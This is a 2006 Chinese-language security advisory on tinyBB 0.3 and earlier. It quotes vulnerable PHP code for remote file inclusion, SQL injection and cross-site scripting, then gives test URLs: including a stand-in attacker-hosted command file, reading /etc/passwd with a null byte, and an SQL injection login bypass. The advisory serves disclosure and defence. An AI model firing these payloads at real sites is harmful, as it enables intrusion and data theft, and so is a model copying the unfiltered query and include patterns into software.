发布日期：2006-05-29
更新日期：2006-05-29

受影响系统：

Epicdesigns tinyBB <= 0.3

描述：

---

BUGTRAQ  ID: 18147

tinyBB是一款简单小巧的开源论坛程序。

tinyBB的实现上存在多个输入验证漏洞，导致SQL注入等各种安全威胁。

tinyBB的footers.php文件没有正确过滤tinyBB.tinybb_footers变量，允许远程攻击者包含任意文件。有漏洞的代码在footers.php的第3行：

3: if (strlen($tinybb_footers) > 0) { require_once($tinybb_footers); }

此外，forgot.php.Parameter $q中存在SQL注入漏洞。漏洞代码在forgot.php的3-18行：

3: if (isset($q)) {
4: $sql="SELECT COUNT(*) FROM tinybb_members WHERE username='$q' OR email='$q'";
5: $count = mysql_result(mysql_query($sql),0);

forgot.php的19-21行还存在跨站脚本漏洞：

19:  else {
20:    echo "&ltp&gtThe query &ltb>$q</b> could not be .....
21:  }

由于没有正确过滤用户名和口令，导致login.php.Parameters中存在另一个SQL注入漏洞。漏洞代码在login.php的2-8行：

8: $sql="SELECT count(*) FROM tinybb_members WHERE flag='1' AND username='$username' AND password='$password'";

<*来源：Mustafa Can Bjorn （nukedx@nukedx.com）
  
  链接：http://www.nukedx.com/?viewdoc=33
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

GET -> http://[victim]/[tBBPath]/footers.php?tinybb_footers=evilscript
EXAMPLE -> http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?
EXAMPLE -> http://[victim]/[tBBPath]/footers.php?tinybb_footers=/etc/passwd%00
GET -> http://[victim]/[tBBPath]/login.php?username=heh/**/or/**/isnull(1/0)/*&password=nothing

建议：

---

厂商补丁：

Epicdesigns
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.epicdesigns.co.uk/

浏览次数：2834
严重程度：0（网友投票）